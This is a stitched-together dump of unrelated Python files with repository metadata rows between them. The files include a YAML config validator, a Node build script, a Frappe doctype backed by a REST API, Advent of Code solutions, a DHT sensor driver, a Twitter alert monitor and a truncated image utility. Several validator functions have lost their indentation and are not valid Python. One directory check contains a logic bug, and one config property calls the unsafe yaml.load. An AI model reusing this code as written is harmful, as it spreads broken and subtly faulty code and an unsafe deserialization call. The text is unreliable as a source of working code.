        unsafe on untrusted files — prefer yaml.safe_load() if the config
        format allows it. Also note the file is re-read on every access.
        """
        if self._config_file is None:
            return None
        else:
            with open(self._config_file, 'r') as yml:
                return yaml.load(yml)
@property
def template_raster(self):
    """Generate template raster specifications from the suitability raster.

    :return: [0] 2D array of template raster values
             [1] 1D flattened array
             [2] row count
             [3] column count
             [4] rasterio profile (metadata) of the source raster
    """
    with rasterio.open(self.historical_suitability_raster) as src_raster:
        profile = src_raster.profile
        array2d = src_raster.read(1)
        row_count = array2d.shape[0]
        col_count = array2d.shape[1]
        array1d = array2d.flatten()
    return array2d, array1d, row_count, col_count, profile
def validate_parameter(self, param, key):
    """Validate parameter existence and range.

    When no YAML config is loaded, `param` itself is validated; otherwise
    the value is read from the config under `key` first.

    :param param: Parameter value
    :type param: float
    :param key: Configuration key from YAML file
    :type key: str
    :return: validated parameter (float within the allowed range)
    """
    if self.config is None:
        is_float = self.validate_float(param)
        return self.validate_range(is_float)
    else:
        is_key = self.validate_key(self.config, key)
        is_float = self.validate_float(is_key)
        return self.validate_range(is_float)
def validate_range(self, value):
    """Ensure `value` lies within [MIN_PARAM_VALUE, MAX_PARAM_VALUE].

    :raises ValueError: when the value falls outside the accepted range
    """
    if (value >= self.MIN_PARAM_VALUE) and (value <= self.MAX_PARAM_VALUE):
        return value
    else:
        raise ValueError(f"Parameter value '{value}' is not within the valid range of {self.MIN_PARAM_VALUE} - {self.MAX_PARAM_VALUE}.")
@staticmethod
def validate_float(val):
"""Ensure parameter value is type float"""
if val is not None:
try:
return float(val)
except TypeError:
raise TypeError(f"Parameter value '{val}' is not a float.")
else:
return None
@staticmethod
def validate_directory(directory):
"""Validate directory to ensure it exists.
:param directory: Full path to the target directory.
:type directory: str
:return: Full path of a valid directory
"""
if (directory is not None) and (os.path.isdir(directory)):
return directory
elif (directory is not None) and (os.path.isdir(directory is False)):
raise NotADirectoryError(f"Directory: {directory} does not exist.")
else:
return None
@staticmethod
def validate_file(file):
"""Validate file to ensure it exists.
:param file: Full path to the target file.
:type file: str
:return: Full path of a valid file
"""
if (file is not None) and (os.path.isfile(file)):
return file
elif (file is not None) and (os.path.isfile(file) is False):
raise FileNotFoundError(f"File: {file} does not exist.")
else:
return None
def validate_step(self, step, key):
    """Validate step existence and value.

    When a YAML config is loaded, the value is read from it under `key`;
    otherwise `step` itself is validated.

    :param step: Time step value
    :type step: int
    :param key: Configuration key from YAML file
    :type key: str
    :return: int time step, or None when unset
    """
    if self.config is None:
        return self.validate_int(step)
    else:
        is_key = self.validate_key(self.config, key)
        return self.validate_int(is_key)
@staticmethod
def validate_int(n):
"""Ensure time step is type int"""
if n is not None:
try:
return int(n)
except TypeError:
raise TypeError(f"Value '{n}' is not an integer.")
else:
return None
@staticmethod
def validate_key(yaml_object, key):
"""Check to see if key is in YAML file, if not return None.
:param yaml_object: YAML object for the configuration file
:param key: Target key name from the configuration file.
:type key: str
:return: Value from configuration file matching the key. If no key present,
return None.
"""
try:
return yaml_object[key]
except KeyError:
return None
@staticmethod
def get_yaml(config_file):
    """Read and parse a YAML config file.

    :param config_file: Full path with file name and extension to the input config.yml file
    :return: parsed YAML config object
    """
    with open(config_file, 'r') as yml:
        # safe_load: yaml.load without an explicit Loader is unsafe and
        # raises TypeError on PyYAML >= 6.
        return yaml.safe_load(yml)
|
IMMM-SFA/population_gravity
|
population_gravity/read_config.py
|
read_config.py
|
py
| 26,485 |
python
|
en
|
code
| 4 |
github-code
|
6
|
7206670163
|
# Build helper for a vendored Node.js source tree. This module is meant to be
# executed, never imported:
assert __name__ == "__main__"

import sys
import os
import subprocess
import shutil
from . import config
# NOTE(review): `shutil` is imported but unused in this script — confirm.

# All build commands run from inside the unpacked node source directory.
os.chdir('node-{}'.format(config.nodeVersion))

configureArgvs = config.configFlags
if config.nodeTargetConfig == 'Debug':
    configureArgvs = configureArgvs + ['--debug-nghttp2', '--debug-lib']

if sys.platform == 'win32':
    # vcbuild.bat reads extra configure flags from the config_flags env var.
    env = os.environ.copy()
    env['config_flags'] = ' '.join(configureArgvs)
    if config.nodeTargetConfig == 'Release':
        print("==============BUILDING RELEASE LIBRARIES=================")
        subprocess.check_call(
            ['cmd', '/c', 'vcbuild.bat', 'release', 'x86', 'small-icu'],
            env=env
        )
    elif config.nodeTargetConfig == 'Debug':
        print("==============BUILDING DEBUG LIBRARIES=================")
        subprocess.check_call(
            ['cmd', '/c', 'vcbuild.bat', 'debug', 'debug-nghttp2', 'x86', 'small-icu'],
            env=env
        )
    else:
        print("======UNKNOWN=======")
else:
    # Non-Windows: configure with ninja, then build the matching output dir.
    # Build as release
    if config.nodeTargetConfig == 'Release':
        print("==============BUILDING RELEASE LIBRARIES=================")
        subprocess.check_call([ sys.executable, 'configure.py', '--ninja' ] + configureArgvs)
        subprocess.check_call(['ninja', '-C', 'out/Release'])
    elif config.nodeTargetConfig == 'Debug':
        # Build as debug
        print("==============BUILDING DEBUG LIBRARIES=================")
        subprocess.check_call([ sys.executable, 'configure.py', '--ninja', '--debug' ] + configureArgvs)
        subprocess.check_call(['ninja', '-C', 'out/Debug'])
    else:
        print("==========UNKNOWN=========")
|
MafiaHub/building-node
|
scripts/build.py
|
build.py
|
py
| 1,694 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26302348125
|
import frappe, requests
from frappe.model.document import Document
class DjangoProperty(Document):
    """Frappe virtual DocType whose records live in a remote Django REST API."""

    def db_insert(self):
        """Create the record via the remote create endpoint; return its JSON."""
        d = self.get_valid_dict(convert_dates_to_str=True)
        res = requests.post(f'{self.get_url()}/propertycreate/',
            data=dict(d))
        return res.json()

    def load_from_db(self):
        """Populate this document's fields from the remote detail endpoint."""
        print(self.doctype, self.name, 'demonstration\n\n\n')
        if(self.name!=self.doctype):
            res = requests.get(f'{self.get_url()}/propertydetail/{self.name}/')
            if(res.status_code==200):
                for key, value in res.json()[0].items():
                    setattr(self, key, value)

    def db_update(self):
        """Persist changes; the remote API reuses the create endpoint for updates."""
        d = self.get_valid_dict(convert_dates_to_str=True)
        res = requests.post(f'{self.get_url()}/propertycreate/',
            data=dict(d))
        return res.json()

    def get_list(self, args):
        """List all remote records; empty list on any non-200 response."""
        url = f"{self.get_url()}/propertylist/"
        res = requests.get(url)
        if(res.status_code==200):
            return res.json()
        # BUG FIX: the original returned json.dumps([]) although `json` was
        # never imported (NameError at runtime), and a JSON *string* would
        # not match the list type returned on success anyway.
        return []

    def get_url(self):
        """Base URL of the Django property service."""
        return "http://192.168.1.156:8000/property"
|
mymi14s/estate_app
|
estate_app/estate_app/doctype/djangoproperty/djangoproperty.py
|
djangoproperty.py
|
py
| 1,046 |
python
|
en
|
code
| 16 |
github-code
|
6
|
30906490211
|
import requests, re
def scrape_images(link):
    """Return the de-duplicated list of image URLs found on the Rightmove
    photo-collage gallery page for the given listing `link`, preserving
    first-seen order.
    """
    # Pretend to be a desktop browser so the gallery page renders normally.
    ua = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36")
    gallery_url = link.replace(
        '?channel=RES_BUY',
        'media?id=media0&ref=photoCollage&channel=RES_BUY',
    )
    response = requests.get(gallery_url, headers={"User-Agent": ua})
    response.raise_for_status()
    pattern = r'((?:https:)(?:[/|.|\w|\s|-])*(?:IMG_\d{2}_\d{4})\.(?:jpg|gif|png|jpeg))'
    found = re.findall(pattern, response.text)
    # dict.fromkeys keeps insertion order while dropping duplicates.
    return list(dict.fromkeys(found))
|
GregorMonsonFD/holmly_sourcing_legacy
|
scripts/python/pdfGen/rightmove_image_extract.py
|
rightmove_image_extract.py
|
py
| 717 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70829089789
|
import logging.config
DEFAULT_LEVEL = logging.WARNING
DEFAULT_FMT = '%(asctime)s | %(levelname)-8s | %(message)s'


def install(level=DEFAULT_LEVEL, fmt=DEFAULT_FMT):
    """Configure root logging, upgrading to colored output when the optional
    `colorlog` package is importable.

    :param level: root log level (default WARNING)
    :param fmt: log record format string
    """
    logging.basicConfig(level=level, format=fmt)
    try:
        import sys
        import colorlog
        formatter = colorlog.ColoredFormatter(
            fmt='%(log_color)s' + fmt + '%(reset)s',
            log_colors={
                'DEBUG': 'blue',
                'INFO': 'green',
                'WARNING': 'yellow',
                'ERROR': 'red',
                'CRITICAL': 'white,bg_red',
            }
        )
        handler = colorlog.StreamHandler(sys.stdout)
        handler.setFormatter(formatter)
        logging.root.handlers.clear()
        logging.root.addHandler(handler)
    except Exception:
        # colorlog is optional: fall back silently to the plain basicConfig
        # handler. The original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt, so narrow it to Exception.
        pass
|
Arcensoth/pymcutil
|
pymcutil/logging/__init__.py
|
__init__.py
|
py
| 799 |
python
|
en
|
code
| 3 |
github-code
|
6
|
27392276941
|
# Parse the cave map: each line "A-B" is an undirected edge, except that no
# edge may lead back into "start" (paths never revisit the start cave).
connections = {}
with open("Day12.txt", 'r') as INPUT:
    data = INPUT.read().split("\n")
for i in data:
    caves = i.split("-")
    if caves[1] != "start":
        if caves[0] in connections:
            connections[caves[0]].append(caves[1])
        else:
            connections[caves[0]] = [caves[1]]
    if caves[0] != "start":
        if caves[1] in connections:
            connections[caves[1]].append(caves[0])
        else:
            connections[caves[1]] = [caves[0]]
def get_paths():
    """Enumerate all start->end paths that visit each small (lowercase) cave
    at most once, using breadth-first expansion over the global
    `connections` adjacency map."""
    complete = []
    frontier = [["start"]]
    while frontier:
        next_frontier = []
        for path in frontier:
            tail = path[-1]
            # A cave with no outgoing edges is a dead end.
            if tail not in connections:
                continue
            if tail == "end":
                complete.append(path)
                continue
            visited_small = {cave for cave in path if cave.islower()}
            for neighbor in set(connections[tail]) - visited_small:
                next_frontier.append(path + [neighbor])
        frontier = next_frontier
    return complete
print("part 1:", len(get_paths()))
def get_paths2():
    """Like get_paths, but a single small cave may be visited twice per path
    (Advent of Code day 12, part two rule)."""
    complete = []
    frontier = [["start"]]
    while frontier:
        next_frontier = []
        for path in frontier:
            tail = path[-1]
            if tail not in connections:
                continue
            if tail == "end":
                complete.append(path)
                continue
            smalls = [cave for cave in path if cave.islower()]
            # True once some small cave already appears twice in this path.
            has_double = len(smalls) > len(set(smalls))
            for neighbor in connections[tail]:
                if neighbor.islower() and neighbor in path:
                    # Revisiting a small cave is allowed only while no
                    # small cave has been doubled yet.
                    if not has_double:
                        next_frontier.append(path + [neighbor])
                else:
                    next_frontier.append(path + [neighbor])
        frontier = next_frontier
    return complete
print("part 2:", len(get_paths2()))
|
stepheneldridge/Advent-of-Code-2021
|
Day12.py
|
Day12.py
|
py
| 1,813 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70143221629
|
# First sight solution
# PART ONE
class Solution:
    """Advent of Code day 1, part one: total fuel for a list of module masses."""

    def findRequirementsForMass(self, the_mass):
        """Fuel for a single module: floor(mass / 3) - 2."""
        return int(int(the_mass) / 3) - 2

    def findSolution(self, inputfile):
        """Sum the fuel requirement of every mass listed (one per line) in
        `inputfile` and return it as an int."""
        total = 0
        for line in open(inputfile):
            total += Solution().findRequirementsForMass(line.strip())
        return int(total)
print("Day One Part One Solution: %d" % (Solution().findSolution('input.txt')))
# PART TWO
# My initial thoughts on this were that it sounded recursive, so thought this was the first
# approach. Took me longer to try it that way than I thought so I went with something more basic.
class SolutionPartTwo:
    """Part two: fuel mass itself needs fuel, iterated until the increment
    is no longer positive (iterative stand-in for the recursive form)."""

    def findRequirementsForMass(self, the_mass):
        """Fuel for a single mass: floor(mass / 3) - 2."""
        return int(int(the_mass) / 3) - 2

    def findSolution(self, inputfile):
        """Total fuel including the fuel-for-fuel correction."""
        total = 0
        for line in open(inputfile):
            step = Solution().findRequirementsForMass(line.strip())
            while step > 0:
                total += step
                step = Solution().findRequirementsForMass(step)
        return int(total)
print("Day One Part Two Solution: %d" % (SolutionPartTwo().findSolution('input.txt')))
|
StephenClarkApps/AdventOfCode2019
|
DayOne/DayOne.py
|
DayOne.py
|
py
| 1,637 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2231582526
|
def state_machine(demanded_state):
    """Dispatch to the screen function for `demanded_state` and return the
    next requested state. 0 = menu, 1 = cycling, 2 = settings, 3 = exit.

    NOTE(review): an unknown state yields the string "Not found!" and
    calling it below raises TypeError — verify upstream only passes 0-3.
    """
    switcher = {
        0: menu,
        1: cycling,
        2: settings,
        3: exit
    }
    func = switcher.get(demanded_state, "Not found!")
    return func()
def allowed_transition(demanded_state, allowed_states=()):
    """Return 1 when `demanded_state` appears in `allowed_states`, else 0.

    BUG FIX: the original iterated the list and used each *value* as an
    index (``allowed_states[i]``), which both compared the wrong elements
    and could raise IndexError. A plain membership scan is the intent.
    (Default changed from a mutable ``[]`` to an empty tuple; behaviour
    for callers is identical.)
    """
    for state in allowed_states:
        if demanded_state == state:
            return 1
    return 0
#std_ret == 0
def menu():
    """Main-menu screen: print the options and return the user's choice.

    Returns 0 (stay in menu) on non-integer input.
    """
    print("\n>>> MAIN MENU <<<")
    print("1. cycling")
    print("2. settings")
    print("3. exit")
    std_ret = 0
    try:
        std_ret = int(input("Transition: "))
    except:
        std_ret = 0
    return std_ret
#std_ret == 1
def cycling():
    """Cycling splash screen (ASCII bicycle); returns the next state choice,
    falling back to 0 (main menu) on non-integer input."""
    print("\n>>> CYCLING <<<")
    print(" __ ")
    print(" __\ \ ")
    print(" (___)) ) ")
    print(" /_/ ")
    try:
        std_ret = int(input("Transition: "))
    except:
        std_ret = 0
    return std_ret
#std_ret == 10
def cycling_start():
    """Active-ride screen stub showing live stats placeholders.

    Allowed transitions out of this state are 1 (cycling), 10 (stay) and
    11 (pause); any other integer falls back to state 1. Non-integer input
    keeps the current state (10).
    """
    print("\n>>> CYCLING <<<")
    print(" Speed: ")
    print("Distance: ")
    print("Altitude: ")
    print(" Time: ")
    try:
        std_ret = int(input("Transition: "))
        # BUG FIX: the original called
        # allowed_transition(std_ret, arr=(1, 10, 11) != 1), which always
        # raised TypeError (no `arr` keyword exists) and was silently
        # swallowed by the bare except. This is the evident intent.
        if allowed_transition(std_ret, (1, 10, 11)) != 1:
            std_ret = 1
    except ValueError:
        std_ret = 10
    return std_ret
#std_ret == 11
def cycling_pause():
    """Pause screen (ASCII pause icon); returns the next state choice, or 0
    (main menu) on non-integer input."""
    print("\n>>> CYCLING <<<")
    print(" __ __ ")
    print(" | | | | ")
    print(" | | | | ")
    print(" |__| |__| ")
    try:
        std_ret = int(input("Transition: "))
    except:
        std_ret = 0
    return std_ret
#std_ret == 2
def settings():
    """Settings screen stub; returns the next state choice (0 on bad input)."""
    print("\n>>> SETTINGS <<<")
    try:
        std_ret = int(input("Transition: "))
    except:
        std_ret = 0
    return std_ret
#std_ret == 3
def exit():
    """Terminal state: print the farewell banner and terminate the program.

    (The name shadows the builtin `exit`; kept because state_machine's
    dispatch table references it.)
    """
    print("\n>>> EXIT <<<")
    print("------- pi-gps 2019 -------")
    # BUG FIX: `sys` is never imported anywhere in this module, so the
    # original raised NameError instead of exiting; import it locally.
    import sys
    sys.exit()
def init():
    """One-time setup stub: open the GPS serial port and predefine the
    GPX/XML metadata constants. Returns 1 on success, 0 on any failure.

    NOTE(review): `serial` and `datetime` are never imported in this module,
    so as written this always lands in the except branch — confirm the
    intended top-of-file imports.
    """
    try:
        #serial setup
        ser = serial.Serial(port="/dev/ttyS0", baudrate=9600, timeout=0.5)
        #create file
        filename = str(datetime.datetime.now().isoformat()) + '.gpx'
        #xml data
        xml_version = "1.0"
        encoding = "UTF-8"
        standalone="yes"
        #gpx data
        gpx_version="1.1"
        creator="pi-gps 2019"
        xsi_schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd"
        xmlns="http://www.topografix.com/GPX/1/1"
        xmlns_gpxtpx="http://www.garmin.com/xmlschemas/TrackPointExtension/v1"
        xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance"
        #metadata
        name="pi-gps"
        activity = "Cycling"
        #return
        std_ret = 1
    except:
        std_ret = 0
    return std_ret
#start from main menu
number_of_active_state = 0
# BUG FIX: std_ret was never initialised before the loop, so the very first
# state_machine(std_ret) call raised NameError. Start in the main menu (0).
std_ret = 0
print("------- pi-gps 2019 -------")
while True:
    std_ret = state_machine(std_ret)
|
frigodaw/pi-gps
|
python/stubs.py
|
stubs.py
|
py
| 3,026 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73185311228
|
# Remove duplicates from a sorted list in place (LeetCode 26 style): compact
# unique values to the front, then truncate the leftover tail.
nums = [0,0,1,1,1,2,2,3,3,4]
count = 1
for i in range(1, len(nums)):
    if (nums[i] != nums[i - 1]):
        nums[count] = nums[i]
        count = count + 1
print(count)
# BUG FIX: the original removed by *value* (nums.remove(nums[count])) over a
# fixed range, which deletes first occurrences out of the already-compacted
# prefix and corrupts the result. Truncating the tail is the intent.
del nums[count:]
print(nums)
|
xuchenxing/MyLeetcode
|
junior/DeleteRepeatFromSortedList.py
|
DeleteRepeatFromSortedList.py
|
py
| 249 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26417087384
|
# Nesting - Store a set of dictionaries in a list or a list of
# items as a value in a dictionary. A power feature !
# An empty list for storing aliens
# At range() returns a set of numbers that teills Python how many
# times we want the lop to repeat. Each time the loop runs we
# create a new alien
# Append each new alien to the list aliens
# Build the fleet: thirty independent green-alien dicts (one fresh dict per
# iteration, so mutating one alien never affects the others).
aliens = [{'color': 'green', 'points': 5, 'speed': 'slow'} for _ in range(30)]

# Show first 5 aliens
for alien in aliens[:5]:
    print(alien)
print("...")

# Show how many aliens created
print("Total no of aliens: " + str(len(aliens)))
# code 2
# use for loop and if statement to change color, etc
# Modify first 3 aliens only
# If statement to ensure that we're onlly modifying green aliens
# Rebuild the fleet, then promote the first three (still green) aliens to a
# tougher yellow tier.
aliens = [{'color': 'green', 'points': 5, 'speed': 'slow'} for _ in range(30)]

for alien in aliens[:3]:
    if alien['color'] == 'green':
        alien['color'] = 'yellow'
        alien['speed'] = 'medium'
        alien['points'] = 10

# show first five aliens
for alien in aliens[:5]:
    print(alien)
print("...")
# List in Dict
# Begin with a dict that holds info about pizza ordered
# One key in the dict is 'crust' and the associated value is
# 'thick'
# Next key 'toppings' with its values
# Summarize order
# To print the toppings, we write a for loop
# To access the list of toppings , use the key 'toppings'
# Python grabs the list of toppongs from the dict
# Info about ordered pizza
# A dict holding one scalar value plus a list value ('toppings').
pizza = {
    'crust': 'thick',
    'toppings': ['mushrooms', 'cheese'],
}

# Summarize the order, then list each topping on its own indented line.
print(f"Ordered a {pizza['crust']}- crust pizza  with the following toppings:")
for topping in pizza['toppings']:
    print(f"\t{topping}")
# Code 2
# Value associated with each name is now a list
# Use the variable langs to hold each value from the dict
# as each value is a list
# Inside the main dict loop, we use another for loop to run
# thru each person's list of fav_lang
# Each dict value is a *list*, so one person can have several favourites.
fav_lang = {
    'je': ['python', 'r'],
    'sa': ['c'],
    'ed': ['r', 'go'],
    'ph': ['python', 'ruby'],
}

for name, langs in fav_lang.items():
    print(f"\n{name.title()}'s fav lang are:")
    for lang in langs:
        print(f"\t {lang.title()}")
# Dict in Dict
# Define a dict called users with two keys: one each for the
# user names. Value associated with each key is a dict.
# Loop thru the users dict. Python stores each key in the
# variable username and the dict associated with each username
# goes into the variable user_info.
# Print the username
# Accessing the inner dict. The variable user_info has 3 keys
# ('first;, 'second', 'location')
# Use each key to generate full name and location for each person
# Dict of dicts: each username maps to that user's profile record.
users = {
    ' aeinstein': {  # NOTE: leading space in this key preserved from the original
        'first': 'albert',
        'last': 'einstein',
        'location': 'princeton',
    },
    'mcurie': {
        'first': 'marie',
        'last': 'curie',
        'location': 'paris',
    },
}

for username, user_info in users.items():
    print("\nUsername: " + username)
    full_name = f"{user_info['first']} {user_info['last']}"
    location = user_info['location']
    print("\tFull name: " + full_name.title())
    print("\tLocation: " + location.title())
|
wenlarry/CrashPython
|
dict_nesting.py
|
dict_nesting.py
|
py
| 3,383 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19181221365
|
"""Add agreed to TOS int field
Revision ID: 51398a87b2ef
Revises: 95c58503e9c0
Create Date: 2020-12-02 09:43:04.949189
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "51398a87b2ef"
down_revision = "95c58503e9c0"
branch_labels = None
depends_on = None
def upgrade():
    """Forward migration: add the NOT NULL integer `accepted_tos` column to
    `users`. server_default="0" lets existing rows migrate without error."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column("users", sa.Column("accepted_tos", sa.Integer(), nullable=False, server_default="0"))
    # ### end Alembic commands ###
def downgrade():
    """Reverse migration: drop the `accepted_tos` column (data is lost)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column("users", "accepted_tos")
    # ### end Alembic commands ###
|
Almenon/couchers
|
app/backend/src/couchers/migrations/versions/51398a87b2ef_add_agreed_to_tos_int_field.py
|
51398a87b2ef_add_agreed_to_tos_int_field.py
|
py
| 696 |
python
|
en
|
code
| null |
github-code
|
6
|
10120432429
|
"""
Library and Wrapper for DHT11 and DHT22 sensors.
Based on https://github.com/JurassicPork/DHT_PyCom/tree/pulses_get
Extensions: Renamed module filename to dht (from dth.py) and added wrapper function
For hardware connection: YELLOW/WHITE: PIN1 VCC through GPIO, PIN2: DATA through GPIO, PIN3: NC, PIN4: GDN. Use also a 4.7k PULL-UP for DATA
"""
import utime
import pycom
import sensors
from machine import Pin
import logging
class DTHResult:
    """Outcome of a DHT.read() call: an error code plus the measured values."""

    # Error codes
    ERR_NO_ERROR = 0
    ERR_MISSING_DATA = 1
    ERR_CRC = 2

    # Class-level defaults; every instance overwrites them in __init__.
    error_code = ERR_NO_ERROR
    temperature = -1
    humidity = -1

    def __init__(self, error_code, temperature, humidity):
        self.error_code, self.temperature, self.humidity = (
            error_code, temperature, humidity)

    def is_valid(self):
        """True when the read completed without any error."""
        return self.error_code == DTHResult.ERR_NO_ERROR
class DTH:
    'DHT sensor (dht11, dht21,dht22) reader class for Pycom'
    #__pin = Pin('P3', mode=Pin.OPEN_DRAIN)
    # 0 = DHT11 encoding, non-zero = DHT21/DHT22 encoding (see read()).
    __dhttype = 0

    def __init__(self, pin, sensor=0):
        """Open `pin` in open-drain mode, release the bus high and give the
        sensor one second to stabilise."""
        self.__pin = Pin(pin, mode=Pin.OPEN_DRAIN)
        self.__dhttype = sensor
        self.__pin(1)
        utime.sleep(1.0)

    def read(self):
        """Perform one measurement; returns a DTHResult.

        Protocol: hold the line low ~19 ms to trigger the sensor, then
        classify the reply pulses (high ~18-28 us = bit 0, ~65-75 us = bit 1)
        into 40 bits = 5 bytes (RH int, RH dec, T int, T dec, checksum).
        """
        # pull down to low
        self.__send_and_sleep(0, 0.019)
        data = pycom.pulses_get(self.__pin,100)
        self.__pin.init(Pin.OPEN_DRAIN)
        self.__pin(1)
        #print(data)
        bits = []
        for a,b in data:
            if a ==1 and 18 <= b <= 28:
                bits.append(0)
            if a ==1 and 65 <= b <= 75:
                bits.append(1)
        #print("bit count: %d " % len(bits))
        if len(bits) != 40:
            return DTHResult(DTHResult.ERR_MISSING_DATA, 0, 0)
        #print(bits)
        # we have the bits, calculate bytes
        the_bytes = self.__bits_to_bytes(bits)
        # calculate checksum and check
        checksum = self.__calculate_checksum(the_bytes)
        if the_bytes[4] != checksum:
            return DTHResult(DTHResult.ERR_CRC, 0, 0)
        # ok, we have valid data, return it
        [int_rh, dec_rh, int_t, dec_t, csum] = the_bytes
        if self.__dhttype==0: #dht11
            rh = int_rh #dht11 20% ~ 90%
            t = int_t #dht11 0..50 deg C
        else: #dht21,dht22
            # 16-bit values scaled by 10; high bit of temperature is the sign.
            rh = ((int_rh * 256) + dec_rh)/10
            t = (((int_t & 0x7F) * 256) + dec_t)/10
            if (int_t & 0x80) > 0:
                t *= -1
        return DTHResult(DTHResult.ERR_NO_ERROR, t, rh)

    def __send_and_sleep(self, output, mysleep):
        """Drive the data pin to `output` and hold it for `mysleep` seconds."""
        self.__pin(output)
        utime.sleep(mysleep)

    def __bits_to_bytes(self, bits):
        """Pack a bit list (MSB first) into a list of bytes, 8 bits each."""
        the_bytes = []
        byte = 0
        for i in range(0, len(bits)):
            byte = byte << 1
            if (bits[i]):
                byte = byte | 1
            else:
                byte = byte | 0
            if ((i + 1) % 8 == 0):
                the_bytes.append(byte)
                byte = 0
        #print(the_bytes)
        return the_bytes

    def __calculate_checksum(self, the_bytes):
        """Datasheet checksum: low byte of the sum of the first four bytes
        (`+` binds tighter than `&`, so this is (sum) & 255)."""
        return the_bytes[0] + the_bytes[1] + the_bytes[2] + the_bytes[3] & 255
def get_reading(data_pin, dht_model, vcc_pin=None):
    """Return a (temperature, humidity) tuple for the given VCC and DATA pins.

    Powers the sensor on via the `sensors` helper, reads it once, then powers
    it off again. Both tuple members are None when `dht_model` is not
    "DHT11"/"DHT22" or the read fails its checksum/length validation.
    """
    sensors.set_sensor_power_on(vcc_pin)
    # measurement: second DTH arg selects the decoding (0 = DHT11, 1 = DHT22)
    if dht_model == "DHT11":
        th = DTH(data_pin, 0)
    elif dht_model == "DHT22":
        th = DTH(data_pin, 1)
    else:
        th = None
    temp = None
    hum = None
    if th:
        result = th.read()
        if result.is_valid():
            temp = result.temperature
            hum = result.humidity
        else:
            logging.error("DHT model [" + dht_model + "]: invalid result.")
    sensors.set_sensor_power_off(vcc_pin)
    # return results
    # print('Temperature: {:3.2f}'.format(result.temperature/1.0))
    # print('Humidity: {:3.2f}'.format(result.humidity/1.0))
    return (temp, hum)
|
insighio/insighioNode
|
insighioNode/lib/sensors/dht.py
|
dht.py
|
py
| 3,993 |
python
|
en
|
code
| 5 |
github-code
|
6
|
42300472031
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 14 12:43:40 2019
@author: Minh
"""
import json
import requests
import tweepy
import base64
import sys
import time
import os
import csv
from AlarmDialogUtil import showAlertDialog
class TwitterMonitor():
    """Watches a fixed set of Twitter accounts and pops an alert dialog for
    every new original tweet (retweets and replies are ignored)."""

    twitter_public = twitter_private = access_token = access_token_secret = ''

    def __init__(self):
        #fill out with keys
        self.twitter_public = 'CONSUMER_KEY'
        self.twitter_private = 'CONSUMER_SECRET'
        self.access_token = 'ACCESS_TOKEN'
        self.access_token_secret = 'ACCESS_SECRET'

    def monitor(self):
        """Open the streaming connection and block, dispatching incoming
        statuses to AlertStreamListener."""
        # BUG FIX: the original used list(123432, 32423432, 23432423), which
        # raises TypeError because list() accepts a single iterable. tweepy's
        # Stream.filter(follow=...) expects an iterable of user-id strings.
        twitter_ids = ['123432', '32423432', '23432423']  # random examples
        auth = tweepy.OAuthHandler(self.twitter_public, self.twitter_private)
        auth.set_access_token(self.access_token, self.access_token_secret)
        api = tweepy.API(auth)
        streamListener = self.AlertStreamListener()
        stream = tweepy.Stream(auth = api.auth, listener=streamListener)
        stream.filter(follow=twitter_ids)

    class AlertStreamListener(tweepy.StreamListener):
        """Stream callback: alert on original tweets and log their raw JSON."""

        def on_status(self, status):
            # Only original tweets: not a retweet and not a reply.
            if(not hasattr(status, 'retweeted_status') and status.in_reply_to_status_id_str == None
                    and status.in_reply_to_user_id_str == None):
                title = status.user.name
                text = "text: {} \n\n url:{}".format(status.text, status.entities['urls'])
                showAlertDialog(title, text)
                with open("twitter/TwitterMonitorLog", "a") as file:
                    file.write(json.dumps(status._json) + "\n\n")

        def on_error(self, status_code):
            if status_code == 420:
                # 420 = rate limited by Twitter.
                print("error on connecting to stream: 420 ; time: {}".format(time.time()))
                #returning False in on_error disconnects the stream
                return False
if __name__ == "__main__":
while True:
try:
TwitterMonitor().monitor()
except Exception as e:
showAlertDialog("Error", "Program exited:\n" + str(e))
time.sleep(60)
|
BeePete/SBV1
|
twitter_monitor.py
|
twitter_monitor.py
|
py
| 2,214 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37395020380
|
import subprocess
import sys
# Launch the game plus the two highscore helpers as sibling processes.
# sys.executable guarantees the same interpreter running this script is used,
# instead of whatever "python" happens to resolve to on PATH (or nothing at
# all on systems that only ship "python3").
game_process = subprocess.Popen([sys.executable, "gameLibrary.py"])

# Start highscoreChecker.py in a subprocess
highscore_checker_process = subprocess.Popen([sys.executable, "highscoreChecker.py"])

# Start highscoreDisplay.py in a subprocess
highscore_process = subprocess.Popen([sys.executable, "highscoreDisplay.py"])

# Wait for the game subprocess to finish
game_process.wait()

# Terminate the other subprocesses once the game exits
highscore_checker_process.terminate()
highscore_process.terminate()
|
Tsukaiyo/cat6Dist
|
cat6/main.py
|
main.py
|
py
| 545 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43243448951
|
import logging
from functools import wraps
from io import BytesIO
from PIL import Image
try:
from PIL import ImageCms # pylint: disable=ungrouped-imports
except ImportError:
ImageCms = None
DEFAULT_SRGB_PROFILE = None
TRANSFORM_FLAGS = 0
else:
DEFAULT_SRGB_PROFILE = ImageCms.ImageCmsProfile(
ImageCms.createProfile("sRGB")
)
TRANSFORM_FLAGS = (
ImageCms.FLAGS["NOTCACHE"]
| ImageCms.FLAGS["NOTPRECALC"]
| ImageCms.FLAGS["BLACKPOINTCOMPENSATION"]
| ImageCms.FLAGS["HIGHRESPRECALC"]
)
CONTENT_TYPE = {
".jpg": "image/jpeg",
".jpeg": "image/jpeg",
".gif": "image/gif",
".png": "image/png",
".webp": "image/webp",
".mp4": "video/mp4",
".webm": "video/webm",
".svg": "image/svg+xml",
".tif": "image/tiff",
".tiff": "image/tiff",
".avif": "image/avif",
".heic": "image/heif",
".heif": "image/heif",
}
EXTENSION = {
"image/jpeg": ".jpg",
"image/gif": ".gif",
"image/png": ".png",
